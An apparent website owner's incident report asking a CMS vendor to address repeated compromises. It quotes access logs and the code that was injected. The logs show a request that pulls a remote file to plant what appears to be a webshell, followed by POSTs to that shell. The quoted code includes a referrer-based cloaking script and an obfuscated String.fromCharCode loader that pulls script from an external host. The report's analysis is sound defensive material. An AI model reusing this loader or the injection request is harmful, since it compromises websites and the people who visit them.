154.89.4.7 - - [30/Dec/2023:15:36:04 +0800] "GET /core/library/think/cache/driver/content.php?name=homes.php&url=http://link.hao-ta.com/1.txt HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:07 +0800] "GET / HTTP/1.1" 200 9476 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:08 +0800] "GET /template/mobile/skin/Lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://www.wang.com/template/mobile/skin/Lib/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:09 +0800] "POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1" 200 136 "https://www.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:14 +0800] "GET /uploads/allimg/20231229/1-23122911143Q52.webp HTTP/1.1" 200 34658 "https://www.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:15 +0800] "GET /core/library/think/cache/driver/homes.php HTTP/1.1" 200 834 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:17 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3370 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
120.229.46.166 - - [30/Dec/2023:15:36:17 +0800] "GET /login.php?m=admin&c=Notify&a=count_unread_notify&_ajax=1&lang=cn HTTP/1.1" 200 147 "https://www.wang.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
180.101.244.14 - - [30/Dec/2023:15:36:20 +0800] "GET /template/mobile/skin/Lib/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://unopengis.wang.com/template/mobile/skin/Lib/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
154.89.4.7 - - [30/Dec/2023:15:36:22 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3740 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
180.101.244.14 - - [30/Dec/2023:15:36:30 +0800] "GET /uploads/allimg/20231229/1-23122911143Q52.webp HTTP/1.1" 200 34658 "https://unopengis.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
59.83.208.107 - - [30/Dec/2023:15:36:35 +0800] "POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1" 200 136 "https://unopengis.wang.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1"
114.119.158.94 - - [30/Dec/2023:15:36:37 +0800] "GET /robots.txt HTTP/1.1" 404 1108 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
154.89.4.7 - - [30/Dec/2023:15:36:38 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3807 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
154.89.4.7 - - [30/Dec/2023:15:36:45 +0800] "POST /core/library/think/cache/driver/homes.php HTTP/1.1" 200 3859 "https://www.wang.com/core/library/think/cache/driver/homes.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
49.71.133.148 - - [30/Dec/2023:15:36:46 +0800] "GET /beijing/chengxiang/ HTTP/1.1" 404 1108 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
154.89.4.7 - - [30/Dec/2023:15:37:04 +0800] "GET /wumim.php HTTP/1.1" 200 3358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
以上是文件被注入期间的访问日志，网站域名已用 wang.com 代替。
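wumim.php 是黑客上传的病毒文件。从上面的日志看，core/library/think/cache/driver/ 目录下的 content.php 和 homes.php 看起来也不是正常文件（content.php 带着 name 和 url 参数被请求后，homes.php 随即可以访问），建议一并排查。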
黑客还修改了 mobile 和 pc 的首页 index 文件，加入了如下代码：
<!-- Injected snippet, kept exactly as quoted in the report.
     It reads document.referrer and checks whether it contains any of the
     substrings baidu, so, yisuo or sogou. When none of them matches, it sets
     document.title to the two eyou:global template values (web_title and
     web_name).
     NOTE(review): this looks like search-engine cloaking; presumably the
     static title of the page was altered as well, so only visitors arriving
     from a search engine see the altered one. Confirm by comparing the index
     template with a known-clean copy.
     NOTE(review): the backslash-escaped quotes are reproduced as posted;
     presumably an escaping artifact of how the snippet was pasted. -->
<script> var referrer = document.referrer; var searchEngines = [\\\'baidu\\\', \\\'so\\\', \\\'yisuo\\\', \\\'sogou\\\']; var isFromSearchEngine = searchEngines.some(function(engine) {return referrer.indexOf(engine) !== -1; }); if (!isFromSearchEngine) {document.title = "{eyou:global name=\\\'web_title\\\' /}-{eyou:global name=\\\'web_name\\\' /}"; }</script>
<!-- Injected loader, kept exactly as quoted in the report.
     The String.fromCharCode list decodes to a script tag of type
     text/javascript whose src is the protocol-relative URL
     //ayuan[.]dadd5696[.]top/ayuan.js (defanged here). document.write then
     inserts that tag into the page, so every visitor's browser fetches script
     from that external host.
     Defender notes: treat the host as an indicator of compromise, search all
     templates and static files for the String.fromCharCode plus
     document.write pair, and restore the index files from a known-clean copy
     rather than editing this line out by hand. -->
<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,121,117,97,110,46,100,97,100,100,53,54,57,54,46,116,111,112,47,97,121,117,97,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>
感觉系统还是有漏洞，很容易就被黑客上传文件了。
请官方重视这个漏洞问题。
网站已经升级到最新版本，而且我把整站下载下来，用护卫神、河马专杀全部查了一遍。
还是几次三番被挂马。
现在网站权重都降低了。